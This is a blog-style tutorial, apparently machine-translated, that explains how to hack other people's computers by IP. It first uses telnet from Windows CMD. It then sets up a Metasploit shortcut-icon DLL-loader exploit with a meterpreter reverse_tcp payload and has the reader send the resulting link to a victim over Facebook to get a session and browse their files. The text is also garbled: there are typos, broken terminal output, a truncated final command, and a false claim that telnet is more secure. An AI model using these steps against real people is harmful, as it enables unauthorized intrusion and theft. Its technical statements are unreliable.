Skip to content Skip to sidebar Skip to footer

How to Hack Other People's Computers via IP 2021

How to Hack Other People's Computers via IP

How to Hack Other People’s Computers via IP – The act of hacking is one of the actions that is prohibited and hated by some people.

Even though there are hacks that are allowed, they are still very feared.

There are many things that can be hacked in this world, such as various applications ranging from social media, chatting and others.

In addition to applications, hacking can also be done on cellphones, whether it’s sophisticated or old school and others.

But in this discussion, we will discuss how to hack a computer device via IP.

There are many ways that can be used to hack a computer, such as using additional applications or taking advantage of menus and features on the computer itself.

For more details, you can refer to the following review on how to hack other people’s computers via IP.

How to Hack Other People’s Computers via IP

1. How to Hack Other People’s Computers via IP Using CMD and Telnet

How to Hack Other People's Computers via IP
How to Hack Other People’s Computers via IP Using CMD and Telnet

Telnet is one of the facilities that will be used to control or remote computers in a network via CMD.

In other words, telnet is a supporting facility that will be used to direct the computer to be hacked via IP using CMD.

In order for telnet to work properly and normally, you must first enable its configuration.

This is sometimes overlooked by some people who use this hack method, so the telnet command fails to connect.

Basically, this telnet command is almost similar to the remote desktop command, but telnet is more secure because this hacking process can be done remotely.

If the telnet is successfully remote, then you can take over the hacked computer.

Meanwhile, how to hack someone else’s computer via IP using CMD and telnet is as follows:

  • Please press Windows key + R (Click Run – type CMD then click OK) and wait for the Dos screen to appear.
  • To make sure whether the telnet function is active or not, please first check which computers are running. Then type the following command:

-net view, checks which network (host) is currently active.

  • Then you also check which ports can be hacked into the computer.
  • Please pay attention to the Foreign Address section, because you will get an open port with port 139. If that is the case, please telnet (space) the destination IP (space) no.Port:

telnet 192.168.16.66 139

  • When finished, continue the step by remotely the other computer that is connected to your computer. The method is the same as above, namely:
  • Telnet 192.168.16.8 (enter), if successful, the display will automatically appear as follows:

C: Documents and SettingsAdministrator>net view

Server Name Remark

PC03 Lpkid

SERVER

SERVER-2003

The command completed successfullya

C:Documents and Settings Administrator>ping 192.168.2.22

Pinging 192.168.2.22 with 32 bytes of data:

Request timed ot.

Replay from 192.168.2.22: bytes=32 time<1ms TTL=128

Replay from 192.168.2.22: bytes=32 time<1ms TTL=128

Requests timed out.

Ping statistics for 192.168.2.22:

Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:Documents and SettingsAdministrator.telnet 192.168.2.22

Welcome to Microsoft Telnet Client

Escape Character is ‘CTRL+]’

You are about to send your password information to a remote computer in internet zone. This might not be safe. Do you want to send anyway(y/n): n (enter n, then enter)

Welcome to Microsoft Telnet Service

Login: ……

password: ******

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>

  • Then do an IP check if you are already on the PC03 computer, in the following way:

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin.ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :

IP Addresses. . . . . . . . . . . . : 192.168.2.22

Subnet Masks . . . . . . . . . . . : 255.255.255.0

Default Gateways . . . . . . . . . ?

C:Documents and Settingsadmin>

  • Then activate the telnet service so that you can enter and which admins are allowed to telnet. If so, then the computer can be controlled or entered, for example to restart by typing the following command:

C:Documents and Settingsadmin>shutdown/?
Usage: shutdown [ -i / -l / -s / -r / -a] [ -f] [ -m computername]
[ -t xx] [-c”c[-c”c

2. How to Hack Other People’s Computers via IP with Linux

How to Hack Other People's Computers via IP
How to Hack Other People’s Computers via IP with Linux

Besides CMD, we can also use Linux to hack other people’s computers and this method is also considered more complex than the other methods.

When using Linux, make sure that your device is connected to a strong and stable internet network, so that the hacking process runs smoothly.

How to hack using Linux is also quite well known among the public, especially hackers.

A derivative of the backtrack kernel is also owned and can be used because it has the same tools as Blackbox, Kali Linux and others.

As for how to hack other people’s computers via IP with Linux as follows:

1. Open Backtrack terminal

  • Download and install Metasploit on your device via the following link (Download Metasploit).
  • After successfully installed, please run the Metasplot then type the following command:

CD (directory location), for example, the location is in cd c:metasploit (press enter).

  • Then also type the next command, namely sudo chmod +x (name of metasploit) and press enter.
  • Continue the steps by typing the following command sudo ./(metasploit name) then press enter.
  • Also type the command msfconsole and hit enter.
  • Please type use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

2. Knowing someone else’s computer IP

  • To view or find out the IP of other people’s computers, please type ifoncfig, then type set srvhost (your IP address) press enter then write again set lhost (your IP address).
  • Then type

PAYLOAD SET windows/meterpreteer/reverse_tcp then press enter.

  • Meanwhile, to find out whether the process was successful or not, please type:

show options then type exploit

  • Automatically you will get IP url like url address http;/192 and send that url address via Facebook to target and make sure he clicks on that url address.
  • To check whether the url address you submitted has been clicked or not, please click on the url address by typing:

sessions -i and retype sessions -i 1.

3. How to hack someone else’s computer

  • You will see which computers have clicked on the url that was sent earlier on sessions -i.
  • Then the hack process can already be started by typing:

  • And you will see various directories or folders on the hacked target computer.

The final word

Those are some ways to hack other people’s computers via IP that can be learned and applied.

Each method has its own advantages and disadvantages, so just choose the one that works best for you.

But we still recommend that you always use this method properly and wisely, so that no party is harmed.

Post a Comment for "How to Hack Other People's Computers via IP 2021"